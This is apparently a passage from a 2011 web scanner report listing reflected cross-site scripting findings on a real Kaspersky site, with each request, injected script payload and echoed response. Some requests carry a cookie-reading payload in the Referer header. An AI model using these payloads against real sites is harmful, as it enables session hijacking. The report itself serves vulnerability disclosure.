The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b646"><script>alert(1)</script>ae9adfd699b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html6b646"><script>alert(1)</script>ae9adfd699b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045517"
Content-Type: text/html; charset=utf-8
Content-Length: 30304
Date: Sun, 17 Apr 2011 13:05:19 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html6b646"><script>alert(1)</script>ae9adfd699b" />
...[SNIP]...

4.56. http://usa.kaspersky.com/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32ac5"-alert(1)-"a94f7d736ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html32ac5"-alert(1)-"a94f7d736ee HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045522"
Content-Type: text/html; charset=utf-8
Content-Length: 30208
Date: Sun, 17 Apr 2011 13:05:23 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html32ac5"-alert(1)-"a94f7d736ee";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.57. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 487ba"><script>alert(1)</script>aa7cd075570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?487ba"><script>alert(1)</script>aa7cd075570=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045508"
Content-Type: text/html; charset=utf-8
Content-Length: 34850
Date: Sun, 17 Apr 2011 13:05:10 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html?487ba"><script>alert(1)</script>aa7cd075570=1" />
...[SNIP]...

4.58. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a7d0"-alert(1)-"126d375c027 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?1a7d0"-alert(1)-"126d375c027=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045514"
Content-Type: text/html; charset=utf-8
Content-Length: 34770
Date: Sun, 17 Apr 2011 13:05:16 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
{ s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html?1a7d0"-alert(1)-"126d375c027=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.59. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5bd2"-alert(1)-"a64730ff9f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/searchb5bd2"-alert(1)-"a64730ff9f0/search.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046599"
Content-Type: text/html; charset=utf-8
Content-Length: 30329
Date: Sun, 17 Apr 2011 13:23:21 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/searchb5bd2"-alert(1)-"a64730ff9f0/search.css?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.60. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b76"><script>alert(1)</script>9e28f61214c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search34b76"><script>alert(1)</script>9e28f61214c/search.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046595"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sun, 17 Apr 2011 13:23:17 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search34b76"><script>alert(1)</script>9e28f61214c/search.css?D" />
...[SNIP]...

4.61. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73b4"><script>alert(1)</script>7c4d80f2788 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.cssf73b4"><script>alert(1)</script>7c4d80f2788?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046604"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sun, 17 Apr 2011 13:23:26 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search/search.cssf73b4"><script>alert(1)</script>7c4d80f2788?D" />
...[SNIP]...

4.62. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d413"-alert(1)-"5ca6375d2ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.css8d413"-alert(1)-"5ca6375d2ca?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046608"
Content-Type: text/html; charset=utf-8
Content-Length: 30329
Date: Sun, 17 Apr 2011 13:23:29 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/search/search.css8d413"-alert(1)-"5ca6375d2ca?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.63. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2010a"><script>alert(1)</script>7da5ccb57fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/2010a"><script>alert(1)</script>7da5ccb57fe HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045225"
Content-Type: text/html; charset=utf-8
Content-Length: 30365
Date: Sun, 17 Apr 2011 13:00:27 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/default/files/2010a"><script>alert(1)</script>7da5ccb57fe" />
...[SNIP]...

4.64. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61fec</script><script>alert(1)</script>a37e498334b was submitted in REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Unlike the quote-breakout payloads used against the same sink in 4.65 and 4.67, this payload never leaves the double-quoted string: the HTML parser ends the enclosing <script> block at the first </script> it encounters, regardless of JavaScript string context, and the <script> element that follows is parsed as a new script. Escaping only the quote character would therefore not fix this sink; the < character must be encoded as well (for example as \u003c) when a request value is written into an inline script.

Request

GET /sites/default/files/61fec</script><script>alert(1)</script>a37e498334b HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045242"
Content-Type: text/html; charset=utf-8
Content-Length: 30405
Date: Sun, 17 Apr 2011 13:00:44 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/default/files/61fec</script><script>alert(1)</script>a37e498334b";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.65. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 981ec"-alert(1)-"965c4b42b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/981ec"-alert(1)-"965c4b42b5c/files/css_injector_1.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045228"
Content-Type: text/html; charset=utf-8
Content-Length: 30366
Date: Sun, 17 Apr 2011 13:00:30 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/981ec"-alert(1)-"965c4b42b5c/files/css_injector_1.css?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.66. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ac6"><script>alert(1)</script>480844bb7c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045223"
Content-Type: text/html; charset=utf-8
Content-Length: 30463
Date: Sun, 17 Apr 2011 13:00:25 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D" />
...[SNIP]...

